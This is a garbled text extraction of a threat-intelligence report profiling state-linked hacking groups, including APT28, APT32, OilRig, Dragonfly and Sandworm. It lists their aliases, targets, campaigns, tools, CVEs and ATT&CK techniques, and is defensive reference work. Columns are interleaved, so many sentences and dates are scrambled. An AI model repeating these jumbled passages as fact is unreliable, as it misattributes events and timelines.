In September 2014, APT28 registered a domain attack also uses a malware variant that shares
characteristics with APT28 backdoors. July 2017 - APT28 targets the hospitality
(smigroup-online.co[.]uk) that appeared to sector in Europe and Middle East
mimic that for the SMi Group, a company that April-Mai 2015 - Attack on the German
plans events for the “Defence, Security, Energy, Parliament October 2017 - Spearphishing using a new
Utilities, Finance and Pharmaceutical sectors.” lure document about the Cyber Conflict U.S.
During this operation, the attacker did not try
Among other events, the SMi Group is currently conference
to hide their trick or to maintain access to the
planning a military satellite communications compromised as we can see during a long- February - October 2018 - APT28 attacks
event for November 2014. term operation. This operation seemed to be various Ministries of Foreign Affairs around
October 2014 - September 2015 - Operation opportunistic and quickly executed to exfiltrate the world
PawnStorm as much data as possible. PaloAlto detected three waves of attacks in February,
Operation Pawn Storm is an economic and political March and June 2018 targeting government
May 2015 - APT28 targets the Ukrainian
cyber-espionage operation that targets a wide organizations dealing with foreign affairs in
Central Election Commission
range of entities, like the military, governments, different geopolitical regions. This operation
defense industries, and the media. Summer 2015 - Sofacy attack waves continued with another wave in October.
During this operation, APT28 intercepted email These attacks targeted the NATO, the Afghan
traffic from the Kyrgyzstan Ministry of Foreign Affairs. Ministry of Foreign Affairs and the Pakistani Military
2015 2016 2017 2018 2019 2020
4 Aug-2014 Feb-2015 Aug-2015 Apr-2016 Jul-2017 Feb-2018 Jul-2019

ishing Attempt to APT28 APT28 targets APT28 targets the APT28 targets the APT28 attacks various Targeting journalist
tani compromise the compromised Russian rockers and Germany’s Christian hospitality sector Ministries of Foreign covering the Caucasus
officials Polish government TV5Monde dissidents Pussy Riot Democratic Union in Europe and Affairs around the world
Middle East
ses
Sep-2014 Apr-2015 Jan-2016 Sep-2017
to Typosquatting of • Operation RussianDoll •A PT28 attacks the World Anti-
rainian Spearphishing using a new
European defense • Attack on the German Doping Agency (WADA)
lure document about the Cyber
exhibition Parliament • APT28 attacks the U.S.
ishing Conflict U.S. conference
Democratic National Committee
tani
officials Oct-2014 Jan-2015
Sofacy May-2015 Mar-2016
Operation APT28 targets the APT28 targets Hillary Clinton Presidential Campaign
attack waves
PawnStorm Ukrainian Central
Election Commission
May-2016
Spear-phishing attack against a U.S. government entity
Nov-2016
APT28 targets the Organization for Security and Co-operation in Europe (OSCE) 19
80 ATK5
FANCY BEAR Cyber Terrorist Cybersecurity Espionage
GROUP 74 Defence Political Manipulation
GROUP-4127 Hacktivist
IRON TWILIGHT Embassies
PAWN STORM State Sponsored
SNAKEMACKEREL Government Agencies
STRONTIUM Unknown
Language
SEDNIT Hospitality
English
SOFACY I nternational Russian
SWALLOWTAIL
TAG_0700 Organizations Georgian
TG-4127 Media
TSAR TEAM

Afghanistan Japan Spain
Armenia Kazakhstan Sweden
Belarus Latvia Switzerland
Belgium Malaysia Tajikistan
Brazil Mongolia Turkey
Bulgaria Montenegro Ukraine
Canada Netherland United
China Poland Kingdom
France Romania United
Georgia Slovakia States
Germany South
Hungary America
Iran South Korea
Russia
Initial Access Defense Evasion Lateral Movement

T1078 - Valid Accounts T1014 - Rootkit T1037 - Logon Scripts
T1091 - Replication Through Removable T1027 - Obfuscated Files or Information T1075 - Pass the Hash
Media T1064 - Scripting T1091 - Replication Through Removable
T1192 - Spearphishing Link T1070 - Indicator Removal on Host Media
T1193 - Spearphishing Attachment T1078 - Valid Accounts T1105 - Remote File Copy
T1199 - Trusted Relationship T1085 - Rundll32 T1210 - Exploitation of Remote Services
Execution T1099 - Timestomp Collection
T1059 - Command-Line Interface T1107 - File Deletion T1005 - Data from Local System
T1064 - Scripting T1122 - C omponent Object Model T1025 - Data from Removable Media
Hijacking
T1085 - Rundll32 T1056 - Input Capture
T1086 - PowerShell T1134 - Access Token Manipulation
T1074 - Data Staged
T1173 - Dynamic Data Exchange T1158 - Hidden Files and Directories
T1113 - Screen Capture
T1203 - Exploitation for Client Execution T1221 - Template Injection
T1114 - Email Collection
T1204 - User Execution T1140 - Deobfuscate/Decode Files or
T1119 - Automated Collection
Information
Persistence T1213 - Data from Information Repositories
T1211 - Exploitation for Defense Evasion
T1037 - Logon Scripts Command and Control
Credential Access
T1067 - Bootkit T1001 - Data Obfuscation
T1003 - Credential Dumping T1024 - Custom Cryptographic Protocol
T1040 - Network Sniffing T1071 - Standard Application Layer
T1122 - C omponent Object Model
Hijacking
T1056 - Input Capture Protocol
T1137 - Office Application Startup Discovery T1090 - Connection Proxy
T1158 - Hidden Files and Directories T1040 - Network Sniffing T1092 - C ommunication Through
T1057 - Process Discovery Removable Media
T1083 - File and Directory Discovery T1105 - Remote File Copy
T1078 - Valid Accounts T1120 - Peripheral Device Discovery Exfiltration
T1134 - Access Token Manipulation T1002 - Data Compressed
21
APT-C-00 Cyber Criminal Administration & Objectives _
77 APT32 Communication Espionage
Cyber Terrorist Financial Services
ATK17
Hacktivist Government Agencies
COBALT KITTY High-Tech
OCEAN BUFFALO State Sponsored International Organizations
OCEAN LOTUS Legal Services
Unknown Manufacturing
SEALOTUS
Media Language
SECTORF01 Military Unknown
Naval
Research
DESCRIPTION
ATK17 is a Vietnamese group that leverages tools. This group is known for the diversity MacOS). He is highly adaptable even
a nearly continuous espionage campaign of the lures that it uses in order to target its when discovered and has used multiple
against various but well-defined targets, victims. It is an active group, with diverse CVEs in order to reach its goals.
while maintaining a developed arsenal of tools on multiple platforms (Windows and

Custom ATK17 netcat CamCapture Plugin CVE-2017-0144
Denis Cobalt Strike CVE-2017-11882
Goopy Customized Windows CVE-2016-7255
Horsum Credentials Dumper CVE-2018-20250
KOMPROGO Customized Outlook
MacOS Trojan Credentials Dumper
PHOREAL Custom IP check tool
Rastls Don’t-Kill-My-Cat
ROLAND GetPassword_x64
Rizzo HookPasswordChange
SOUNDBITE KerrDown
U
nnamed Outlook Mimikatz
Backdoor PowerShell
WINDSHIELD Microsoft scripting tool
Remy
Splinter

Targeted
Countries _
Australia U
nited
China States
Germany Vietnam
Philippines
S
outheast
Asia
Viet Nam
CAMPAIGNS
2010 - First mention of APT32 Civil Service, National Assembly - Senate 2014
2014
The first mention of a Vietnamese attacker Relations and Inspection, Social Affairs, Germany, 2014
group dates from a Google report from Veterans, and Youth Rehabilitation as Manufacturing
Southeast Asia,
2010. At that time, the group deployed a well as the National Election Committee dissidents in
Vietnamese
relatively simple malware embedded in a and the National Police of Cambodia, 2014 diaspora
Vietnam,
Vietnamese keyboard software. This malware Various Chinese private companies, Network Security
was used in order to conduct denial of A province website in Laos, as well as the 2015
service attacks against blogs belonging Ministry of Public Works and Transport,
to activists, as well as Espionage on them. 2015
The Army and Office of the President China
Evolution of the group to an Advanced of Philippines.
Persistent Threat (APT) group. In November 2018, a new wave of
2015
Vietnam,
By the end of 2013, the group used a whole compromised websites was discovered, Media
new set of tools to spy on EFF staffers and containing, among others:
Associated Press reporters. This toolset Multiple media websites and blogs in 2016 2016
was used exclusively for Espionage, and Vietnamese, Philippines,
the DDoS possibilities that were present in 2016 Consumer products
previous iterations are no longer present. Vietnamese websites about religion, Philippines, IT
2016
Various ministries in Cambodia, USA, Consumer
Widening of APT32’s scope. 2016 products.
A golf club in Phnom-Penh,
Between 2014 and 2017, the group Vietnam, Banking
2016
developed its potency in two ways. Firstly, The websites of the Former Vietnamese
Vietnam, Media
its arsenal gained new tools, dubbed Prisoners of Conscience, 2017
2017
Windshield, Komprogo, Soundbite, Denis, A Cambodian newspaper. Australia,
Phoreal and an unnamed outlook backdoor. Dissidents in
APT32 changes its delivery method. Vietnamese
Secondly, the group changed the scope diaspora
In 2018, the group was seen using new 2017
and the target distribution of its victims:
methods in order to deliver its malwares: Philippines,
While continuing its attacks on political Government
Massive campaign in the Indochinese

employees
dissidents, it also attacked private 2018
corporations interested in manufacturing, Peninsula
IT and Network security, a new sector of The group, since 2018, developed a new
interest. loader probably from scratch, KerrDown.
These attacks were domestic but also Using the Eternal Blue vulnerability, it
international. compromised a Vietnamese company
New techniques for selecting APT32 that provides software to the government,
victims. It also launched a vast campaign in the
In late 2016 - early 2017, the group Indochinese Peninsula, targeting the
started massively using watering hole, following entities:
compromising many websites in order A Vietnamese real estate developer,
to attract persons of interests for possible The national bank of Vietnam,
compromise. The sheer number of websites
A Vietnamese company that provides
that have been compromised (more than
software to the government,
a hundred) shows that this threat actor is
targeting a vast number of sectors. A Vietnamese IT company,
At the time the campaign was discovered, The Cambodian youth federation,
we notably find: The ASEAN, in Thailand, probably in
Various domains related with the ASEAN, prevision of the 34th ASEAN Meeting
in Bangkok, Thailand, on June 2019.
The ministry of Foreign Affairs, Environment,
23
77 APT32 Communication Espionage
Cyber Terrorist Financial Services
ATK17
Hacktivist Government Agencies
COBALT KITTY High-Tech
OCEAN BUFFALO State Sponsored International Organizations
OCEAN LOTUS Legal Services
SEALOTUS Language
Media
SECTORF01 Military Unknown
Naval
Research

Targeted
Countries _
Australia U
nited
China States
Germany Vietnam
Philippines
S
outheast
Asia
Viet Nam

T1078 - Valid Accounts T1027 - Obfuscated Files or Information T1021 - Remote Services
T1133 - External Remote Services T1064 - Scripting T1076 - Remote Desktop Protocol
T1192 - Spearphishing Link T1066 - Indicator Removal from Tools T1105 - Remote File Copy
T1193 - Spearphishing Attachment T1078 - Valid Accounts Collection
Execution T1107 - File Deletion T1056 - Input Capture
T1047 - W i n d o w s M a n a g e m e n t T1108 - Redundant Access T1113 - Screen Capture
Instrumentation T1140 - Deobfuscate/Decode Files or T1119 - Automated Collection
Information
T1053 - Scheduled Task Command and Control
T1059 - Command-Line Interface
T1223 - Compiled HTML File
T1008 - Fallback Channels
T1064 - Scripting Credential Access
T1032 - Standard Cryptographic Protocol
T1086 - PowerShell T1003 - Credential Dumping T1071 - Standard Application Layer
T1204 - User Execution T1056 - Input Capture Protocol
T1223 - Compiled HTML File T1110 - Brute Force T1094 - Custom Command and Control
Persistence Discovery Protocol
T1053 - Scheduled Task T1007 - System Service Discovery T1105 - Remote File Copy
T1078 - Valid Accounts T1012 - Query Registry Exfiltration
T1100 - Web Shell T1016 - System Network Configuration T1048 - E xfiltration Over Alternative
T1108 - Redundant Access Discovery Protocol
T1133 - External Remote Services T1033 - System Owner/User Discovery
Privilege Escalation T1046 - Network Service Scanning
T1049 - System Network Connections
Discovery
T1057 - Process Discovery
T1100 - Web Shell
T1069 - Permission Groups Discovery
T1082 - System Information Discovery
T1087 - Account Discovery
T1201 - Password Policy Discovery
25
APT34 Cyber Criminal Aviation & Objectives _
79 ATK40 Education Cyber Espionage
Cyber Terrorist
ATK58 Energy
CLAYSLIDE Hacktivist
Financial Service
CRAMBUS State Sponsored Government Agencies
HELIX KITTEN
Unknown High-Tech
HELMINTH
Hospitality Language
IRN2
Unknown
OILRIG
TWISTED KITTEN
DESCRIPTION
ATK40 (OilRig, APT34) is an Iranian and control server to stay under the radar. quality of his lure documents.
cyberespionage threat actor active since In early 2017, the group demonstrate the DragoS considers that ATK40(OilRig) and
at least 2014 primarily operating in the ability to use digitally signed malware ATK59(Greenbug) are the same threat
Middle East region. The group targets as a spread through fake websites (University group and carried out initial preparations
priority the financial institutions of the Sunni of Oxford conference sign-up page and and network intrusion in advance of the
Gulf States, but also the United States and a job application website). PaloAlto Shamoon event. This group test regularly its
Israel, traditional geopolitical opponents observed an overlap in C&C IP address samples on anti-virus testers like VirusTotal
of the Republic of the Mullahs. During used by OilRig and used by Chafer for to determine on what content of their
the OilRig campaign in 2016 against his Remexi backdoor C&C, suggesting malwares are detected. This technique
financial institutions in Saudi Arabia, the that these groups are one entity or that helped to build nearly undetected samples
group demonstrate capabilities to adapt they share resources. Furthermore, the but allowed researchers to follow the
its procedures and to use multiple delivery similarity between the malware ISMAgent modifications. In April 2019, multiple
methods, particularly through well-crafted used by OilRig and ISMDoor used by OilRig tools are leaked on a Github
spear-phishing messages relevant to the GreenBug (ATK59) suggest a link between repository, including BONDUPDATER,
interests of targeted personnel and custom these groups. the TwoFace WebShell and webmask, a
PowerShell implants like the Helminth This actor shows high capabilities of tool linked to DNSpionage. This leak is
backdoor. He relies heavily on the human adaptation, creating new custom delivery followed in June 2019 by another about
factor for the initial access. After the firsts documents and backdoor and using the tool Jason.
report by FireEye and PaloAlto, the group multiple TTP to re-infect previous targets OilRig infrastructure is continuously
has been actively updating his tools and who took actions to counter their known growing but overlaps with previously
expands his scope of targets (Qatar, TTP. We did not observe this actor using used infrastructure. The group reuse his
Turkey, Israel and United States). The a zero-day exploit, but it quickly used the tools, use the same attack protocols and
group continue to use communication CVE-2017-0199 and CVE-2017-11882 has a consistent victimology which makes
though DNS Tunnelling to the command which are widely used to improve the it easy to track down.

ALMA ConfuserEx CVE-2017-11882
Communicator Invoke-Obfuscation CVE-2017-0199
BONDUPDATER Mimikatz
CANDYKING Net
Clayslide netstat
GOLDIRONY PsExec
Helminth Plink
Jason Reg
KEYPUNCH SmartAssembly .NET
ISMAgent obfuscator
ISMInjector SoftPerfect Network
OopsIE Scanner
POWBAT Tasklist
POWRUNER
QUADAGENT
RGDoor
SEASHARPEE
ThreeDollars

Targeted
Countries _
Azerbaijan Turkey
Israel U
nited
Kuwait States
Lebanon U
nited
Mauritius Arab
Qatar Emirates
S
audi
Arabia
Iran
CAMPAIGNS
2015 - October2016 -Wave ofemails August 2017 - Use of ISMInjector to 2015
containing malicious attachments deliver ISMAgent to an organization

being sent to multiple organizations within the United Arab Emirates Jun-2015
in the Middle East government 2015-Oct 2016
Wave of emails
In the first week of May 2016, FireEye In August 2017, PaloAlto discovered a containing
malicious
and PaloAlto identified a wave of email new trojan called ISMInjector developed attachments being
sent to multiple
containing malicious attachment sent to by OilRig. This malware was used during organizations in
multiple banks and technology organizations a campaign targeting an organization in the Middle East
in Saudi Arabia. In October 2016, PaloAlto the United Arab Emirates government.
observed the improvement of Clayslide
and Helminth. The group started to target January 2018 - Attack against 2016
organizations in other country like Qatar an insurance agency based in the

and government organizations in Israel, Middle East using OopsIE and the
Turkey and United States. ThreeDollars delivery document
On January 8, 2018, PaloAlto observed
Late 2016 - OilRig set up a fake an attack against an insurance agency Oct-2016
VPN Web Portal targeting Israeli based in Middle East, follow by attack Late 2016
organizations against a financial institution on January OilRig set up a fake
VPN Web Portal
This campaign targeted at least five Israeli 16. The second organization was previously targeting Israeli
organizations
IT vendors, several financial institutes and targeted in January 2017. 2017
the Israeli Post Office. Apr-2017
May - June 2018 - Attack using
OilRig also registered for domains Politically
QUADAGENT motivated,
impersonating The University of Oxford targeted campaign
Jul-2017
in a fake conference registration website Between May and June 2018, PaloAlto carried out against
numerous Israeli Targeted attacks
where visitors are asked to download a observed OilRig attacks against a government organizations delivering
fake registration tool. agency in the Middle East. This attack ISMAgent
leveraged credential harvesting and Aug-2017

April 2017 - Politically motivated, compromised account to use the government Use of ISMInjector to deliver ISMAgent
to an organization within the United Arab
targeted campaign carried out against agency as launching platform for other Emirates government
numerous Israeli organizations attacks including one against a technology 2018

Jan-2018
From April 19 to April 24, 2017 an attack service provider and one against another Attack against an
targeting multiple Israeli organization was government agency. insurance agency

based in the Middle
East using OopsIE
delivered through compromised email Summer 2018 - Attacks on Middle May-Jun-2018
and TheeDollars
accounts at Ben-Gurion University. High- East entities
Attack using
QUADAGENT
devivery document
Tech companies, medical organizations Summer 2018

During the summer 2018, CrowdStrike
and education organizations were victims Attacks on Middle
observed OilRig targeting entities that East entities
of this campaign. Morphisec described
appeared to be located in Bahrain and Nov-2018
this campaign as politically motivated.
Kuwait. Attack on the
Telecommunication
July 2017 - Targeted attacks 2019
November 2018 - Attack on the
sector
delivering ISMAgent
Telecommunication sector
In July 2017, PaloAlto observed an attack
In November 2018 CrowdStrike observed
targeting a Middle eastern technology
OilRig targeting the telecommunication
organization which has been already
sector. While it used his known TTP, this
targeted during the campaign of August
activity represented a shift in targeting.
2016.
We can suppose that this attack came in
support of another operation.
27
APT34 Cyber Criminal Aviation & Objectives _
79 ATK40
Cyber Terrorist Education Cyber Espionage
ATK58 Energy
CLAYSLIDE Hacktivist
Financial Service
CRAMBUS State Sponsored Government Agencies
HELIX KITTEN
Unknown High-Tech
HELMINTH Language
IRN2 Hospitality
Unknown
OILRIG
TWISTED KITTEN

Targeted
Countries _
Azerbaijan Turkey
Israel U
nited
Kuwait States
Lebanon U
nited
Mauritius Arab
Qatar Emirates
S
audi
Arabia
Iran

T1133 - External Remote Services T1064 - Scripting T1076 - Remote Desktop Protocol
T1192 - Spearphishing Link T1066 - Indicator Removal from Tools T1105 - Remote File Copy
T1193 - Spearphishing Attachment T1078 - Valid Accounts Collection
Execution T1107 - File Deletion T1056 - Input Capture
T1047 - W i n d o w s M a n a g e m e n t T1108 - Redundant Access T1113 - Screen Capture
Instrumentation T1140 - Deobfuscate/Decode Files or T1119 - Automated Collection
Information
T1053 - Scheduled Task Command and Control
T1059 - Command-Line Interface
T1223 - Compiled HTML File
T1008 - Fallback Channels
T1086 - PowerShell T1003 - Credential Dumping T1071 - Standard Application Layer
T1204 - User Executio T1056 - Input Capture Protocol
T1223 - Compiled HTML File T1110 - Brute Force T1094 - Custom Command and Control
Persistence Discovery Protocol
T1053 - Scheduled Task T1007 - System Service Discovery T1105 - Remote File Copy
T1078 - Valid Accounts T1012 - Query Registry Exfiltration
T1100 - Web Shell T1016 - System Network Configuration T1048 - E xfiltration Over Alternative
T1108 - Redundant Access Discovery Protocol
T1133 - External Remote Services T1033 - System Owner/User Discovery
Privilege Escalation T1046 - Network Service Scanning
Discovery
T1100 - Web Shell
T1201 - Password Policy Discovery
29
ATK6 Cyber Criminal Aviation & Objectives _
76 CROUCHING YETI Defence Espionage
Cyber Terrorist
DRAGONFLY Energy
DYMALLOY Hacktivist
ENERGETIC BEAR State Sponsored
GROUP 24
Unknown
HAVEX
Language
KOALA TEAM Unknown
IRON LIBERTY
TG-4192
DESCRIPTION
Dragonfly is a cyber espionage group uncomfortable, especially since Russia the context of the crisis prompted Russia
that has been active since at least 2010. has been supplying more than a third of to change its pressure strategy by raising
They initially targeted defense and aviation the imported natural gas since 2010. In the price of gas for the country by 44%
companies but shifted to focus on the energy 2009, it was therefore decided to diversify on 1 April 2014 (in 2013 it imports half
sector in early 2013. Dragonfly's activities the sources of supply by reinvigorating the of its consumption from Russia). Three
can be separated into three periods: Nabucco alternative gas pipeline project days later, a new increase is decided for
2010-2013, the beginning of its activities (from Iran and avoiding Ukraine), which is a total augmentation of 80%.
using large spam campaigns a direct competitor of the Russian South In response, and after the Crimean war
Stream project. between February and March 2014, the
2013-2014, when it started to target the
energy sector using spear-phishing This competition has shown Russia that European Union and the United States
the European Union is seeking to get rid applied economic sanctions against Russia.
2015-2019, a re-launch of its attacks
of its energy grip. Tension only ceased These are in addition to the decline in
after a break.
with the exhaustion of Nabucco, as Russia European energy demand, competition
International context managed to empty the project's sources with Iran in the gas sector and the global
It must be remembered that these Dragonfly of supply by encouraging Azerbaijan to decline in hydrocarbon prices. All these
Group campaigns take place in a complex turn to South Stream and Turkmenistan factors lead to a contraction in Russian
and turbulent international context. The to China (these two countries were the activity between 2015 (-2.8%) and 2016
years 2000-2010 are marked by the main sources of supply for the project). (-0.2%).
acceleration of the European Union's search At the end of 2013, an Association Agreement Over the entire period covered by Dragonfly's
for alternatives regarding its gas supply is about to be signed between the EU activities, Russia's annual growth rate
sources. Because of the dependence on and Ukraine. As a result, Russia is putting stagnated at just over 0%. The group's
imported Russian natural gas, the Union pressure on Ukrainian President Viktor various stages of activity over the period
is concerned. Yanukovych, who decided on November in question, the choice of targets and the
Between 2010 and 2016, the EU Member 2013 to abandon the project, triggering modus operandi suggest that there is a
States had an average energy dependence Euromaïdan demonstrations and the concordance of interests with the Russian
rate of 53.44% on the rest of the world Ukrainian crisis. On February 22, 2014, State. If DragonFly did not exclusively target
according to Eurostat (with wide disparities the Ukrainian President was dismissed the gas sub-sector, espionage in the energy
between countries). This inability to meet and replaced by Oleksandr Tourtchynov. sector can attest to this convergence.
its consumption needs alone is strategically Ukraine's political change of course in

Targeted
Countries _
Canada Serbia
France Spain
Germany Turkey
Greece U
nited
Italy Kingdom
Norway U
nited
Poland States
Russia
CAMPAIGNS TOOLS, MALWARES

AND VULNERABILITIES
First campaign against the US and 2010
Canada
Malwares
Dragonfly initially target defence and
CrackMapExec
aviation companies is the US and Canada
Dorshel
before shifting to US and European energy 2011
Goodor
sector target in 2013. 2010-2013 IKLG (Keylogger)
Changing targets - attacks on the First campaign
against the US and Karagany
energy sector Canda Lightsout exploit kit
Since 2013 it targets energy grid operators, 2012 Listrix
companies related to industrial control MCMD
systems (ICS), major electricity generation Oldrea
firms, petroleum pipeline operators, and ScreenUtil
energy industry industrial equipment providers 2013
and nuclear industries. Dragonfly started to 2013
target the Energy suply chain by targeting Changing Targets: Legitimate software
attacks on the
ICS equipment providers in March 2014 energy sector Angry IP Scanner
with the Havex trojan. It compromised their Inveigh
legitimate softwares which were available 2014 Mimikatz
for download on their websites such as Phishery
the MESA Imaging driver (from the Swiss PsExec
company MESA Imaging), eCatcher (from
the Belgian company eWon) or multiple 2015
Exploited vulnerabilities
softwares from the German company MB
None
Connect Line GmbH.
December 2015 - 2018 - CASTLE
campaign 2016
It will re-emerge in December 2015 with a

campaign named “CASTLE campaign” by Dec-2015-2018
Dell Secureworks. The group initially used CASTLE campaign
spam email campaigns and watering hole 2017

attack to infect targeted organizations. It
started to use spear-phishing in February
2013 to deliver malicious PDF attachment
in email which topics where related to office
2018
administration issues to selected. At this
time, it used compromised websites as C2
servers. It appears that its main target was
the energy sector and industrial control
system located in Europe while US victims
are collateral damages. After the 2014-
2015 quiet period, the group reappear
in what Symantec called Dragonfly 2.0,
targeting the energy sector in the US,
Turkey and Switzerland.
31
ATK6 Cyber Criminal Aviation & Objectives _
76 CROUCHING YETI Defence Espionage
Cyber Terrorist
DRAGONFLY Energy
DYMALLOY Hacktivist
ENERGETIC BEAR State Sponsored
GROUP 24
Unknown
HAVEX
Language
KOALA TEAM Unknown
IRON LIBERTY
TG-4192

Targeted
Countries _
Canada Serbia
France Spain
Germany Turkey
Greece U
nited
Italy Kingdom
Norway U
nited
Poland States
Russia
Initial Access Privilege Escalation Lateral Movement

T1078 - Valid Accounts T1053 - Scheduled Task T1076 - Remote Desktop Protocol
T1133 - External Remote Services T1078 - Valid Accounts T1105 - Remote File Copy
T1189 - Drive-by Compromise T1100 - Web Shell Collection
T1192 - Spearphishing Link Defense Evasion T1005 - Data from Local System
T1193 - Spearphishing Attachment T1036 - Masquerading T1074 - Data Staged
Execution T1064 - Scripting T1113 - Screen Capture
T1053 - Scheduled Task T1070 - Indicator Removal on Host T1114 - Email Collection
T1059 - Command-Line Interface T1078 - Valid Accounts Command and Control
T1064 - Scripting T1089 - Disabling Security Tools T1043 - Commonly Used Port
T1086 - PowerShell T1107 - File Deletion T1071 - Standard Application Layer
T1204 - User Execution T1112 - Modify Registry Protocol
Persistence T1221 - Template Injection T1105 - Remote File Copy
T1023 - Shortcut Modification Credential Access Exfiltration
T1053 - Scheduled Task T1003 - Credential Dumping T1002 - Data Compressed
T1060 - Registry Run Keys / Startup Folder T1098 - Account Manipulation
T1078 - Valid Accounts T1110 - Brute Force
T1098 - Account Manipulation T1187 - Forced Authentication
T1100 - Web Shell Discovery
T1133 - External Remote Services T1012 - Query Registry
T1136 - Create Account T1016 - System Network Configuration
Discovery
T1018 - Remote System Discovery
T1033 - System Owner/User Discovery
T1083 - File and Directory Discovery
T1135 - Network Share Discovery
33
ATK14 Cyber Criminal Energy & Objectives _
74 BLACK ENERGY Cyber Espionage
Cyber Terrorist
ELECTRUM Sabotage
GREYENERGY Hacktivist
QUEDAGH State Sponsored
SANDWORM
Unknown
TELEBOTS Language
TEMP.NOBLE Unknown
VOODOO BEAR
DESCRIPTION
ATK14 is an attacker group of Russian Origins of the group code for $700. Several actors did use this
origins, active since at least 2008. This The malware BlackEnergy is a malware, malware, continuing DDoS attacks against
attacker is extremely active and competent allegedly created in 2006-2007. It was Georgia. Around 2014, a group created
and is well known for the BlackEnergy used to launch DDoS attacks against SCADA and ICS plugins for BlackEnergy,
campaign as well as the NotPetya campaign. machines. It was used against Georgia in order to target manufacturing and the
We think that this adversary is linked to and Estonia in large campaigns, taking energy sector worldwide. This is the group
the government. down governmental and banking websites. named ATK14.
The attacker reportedly sold the source

BCS-Server 3proxy CVE-2017-0144
BlackEnergy Dante CVE-2014-1761
C99shell Dropbear SSH CVE-2010-3333
GCat Mimikatz CVE-2017-0143
GreyEnergy Nmap CVE-2017-0146
Potao Plink CVE-2017-0147
Telebot
WSO

Targeted
Countries _
Poland
Russia
Ukraine
Russia
CAMPAIGNS
2011 - 2015 - Operation Potao SCADA systems of their victims, turning 2018 - 2019 - Continuation of
Between 2011 and 2013, a malware substations off. The group also launched campaigns, and links with other
called Potao has been seen geographically a more classic DDoS attacks on the call groups
targeting Russia, Armenia, and Georgia. In centres of the electrical companies in order Samples recovered by Kaspersky and FireEye
late 2013, the malware started shifting its to make them unavailable to customers. suggest an overlap in some infrastructure
focus towards Ukraine, with several samples This attack deprived many persons of of the BlackEnergy and Sofacy group.
targeting this country. Among the victims electricity during up to 6 hours. This attack
is one of the first case of cyber-sabotage In 2019, the group has continued its
from the malware are high prevalence targeting of specific entities, with no
targets, especially since September 2014, of an electric grid and shows the attacker's
determination and competences. specific development. Some campaigns
including the Ukrainian government and started in 2018 might still be in progress,
armed forces.
2016 - Continuing interest in energy, but no new campaign of large size has
2013 - 2014 - BlackEnergy Lite and renewal of the group’s arsenal been detected.
By 2013, the BlackEnergy trojan was still In 2016, we observe a change in the
active and underwent further development. group's arsenal.
2008
This led to the creation of new versions,
December 2016 - Second attack
dubbed BlackEnergy2 and BlackEnergy3. Oct-2008
against Ukraine’s power grid
Using this family, the group lead campaigns October 2008
that were targeted attack, approximately The 17th December 2016, a new malware 2009 GreyEnergy
at the same time as the Potao malware. strain, called Industroyer/Crashoverride was
discovered. This malware was specifically
As for the Potao campaign, a lot of the designed in order to be able to target 2010
group's victims were in Ukraine (around industrial control systems, and its use lead
50%, the remaining half located in Poland) to a massive power outage in Kiev, that
and were high profile targets such as state lasted around one hour.
organizations and businesses. 2011
June 2017 - NotPetya outbreak Jan-2011

2015 - Evolution of BlackEnergy/ 2011-2015
MeDoc is an accounting program used in
KillDisk Operation Potao
Ukraine by most of domestic firms. It can 2012
In 2015, the BlackEnergy malware was update itself from a remote server. Prior
used in various campaigns, that can be to June 2017, this server was breached
identified by the “Build ID” of a sample. by the group, who could therefore push 2013
While in 2014, a destructive plugin, dstr was malicious files instead of updates. The
introduced, a new one, having the same 27th June, the group deployed a fake
purpose was deployed in some campaigns, update, that was therefore downloaded Jan-2013
2014 2013-2014
this destroyer, named KillDisk, overwrites and launched by the MeDoc update BlackEnergy Lite
all the disk with random data and make the process. This fake update was containing
OS unbootable. This component was used a malware, named NotPetya. Jan-2015
in November 2015, in an attack against 2015 Evolution of
Ukrainian media companies ahead of the October 2017 - BadRabbit BalckEnergy -
KillDisk Dec-2015
2015 Ukrainian local elections. In October 2017, the group used another Power outage in
strain of malware, named BadRabbit in 2016 Jan-2016 Ukraine
December 2015 - Power outage Continuing interest
order to target victims in Ukraine. It hit
in Ukraine major infrastructures, including the metro
in energy and
renewal of the
Dec-2016
ATK14, during previous campaigns showed of Kiev, an airport and a naval port in
group arsenal
Second attack
2017
interest in energy companies. From the Odessa, as well as Ukrainian ministries. against Ukraine
Jun-2017 power grid
start of 2015, the group implanted itself
in many electricity companies, in order October 2018 - GreyEnergy NotPetya outbreak
Oct-2017
2018
to install BlackEnergy and accessing their By October 2018, the group used a new BadRabbit
SCADA infrastructure. The 23rd December, malware: GreyEnergy.
the attackers successfully hijacked the
Nov-2018
2019
2018-2019
Continuation of
campains and links
with others groups
35
74 BLACK ENERGY Cyber Espionage
Cyber Terrorist
ELECTRUM Sabotage
GREYENERGY Hacktivist
QUEDAGH State Sponsored
SANDWORM
Unknown
TELEBOTS Language
TEMP.NOBLE Unknown
VOODOO BEAR

Targeted
Countries _
Poland
Russia
Ukraine
Russia
Initial Access Credential Access Command and Control

T1192 - Spearphishing Link T1145 - Private Keys T1024 - Custom Cryptographic Protocol
T1193 - Spearphishing Attachment Discovery T1043 - Commonly Used Port
T1195 - Supply Chain Compromise T1016 - System Network Configuration T1071 - Standard Application Layer
Execution Protocol
Discovery
T1049 - System Network Connections Exfiltration
Instrumentation Discovery T1020 - Automated Exfiltration
T1203 - Exploitation for Client Execution T1082 - System Information Discovery Impact
Persistence T1087 - Account Discovery T1486 - Data Encrypted for Impact
T1023 - Shortcut Modification Lateral Movement T1487 - Disk Structure Wipe
T1060 - Registry Run Keys / Startup Folder T1077 - Windows Admin Shares T1488 - Disk Content Wipe
T1067 - Bootkit T1495 - Firmware Corruption
Collection T1498 - Network Denial of Service
T1113 - Screen Capture T1499 - Endpoint Denial of Service
T1119 - Automated Collection
37
APT 10 Cyber Criminal Defence & Objectives _
73
ATK41 Energy Espionage
CVNX Cyber Terrorist
Financial Services
CLOUD HOPPER Hacktivist
DUSTSTORM Government Agencies
HAPPYYONGZI State Sponsored High-Tech
HOGFISH Unknown Media
MENUPASS Language
POTASSIUM Unknown
RED APOLLO
STONE PANDA
DESCRIPTION
ATK41 (APT10, Stone Panda, CVNX, Happyyongzi) is a threat group that
MenuPass Group, Potassium, Red Apollo, appears to originate from China and has
Hogfish, Cloud Hopper, DustStorm, been active since approximately 2009.
CAMPAIGNS
Jan-2010
Dust Storm and targeted at least three American 2010
Dust Storm
A long-standing persistent threat targeting and European companies. Among these
numerous major industries spread across companies are IT and business cloud services
2011
Japan, South Korea, the United States, managed service provider (MSP) and Visma,
Europe, and several other Southeast a billion-dollar Norwegian company with
Asian countries has been discovered. This at least 850,000 customers globally, an 2012
operation is baptized Dust Storm. international apparel company, a U.S. law

firm with specialized in intellectual property
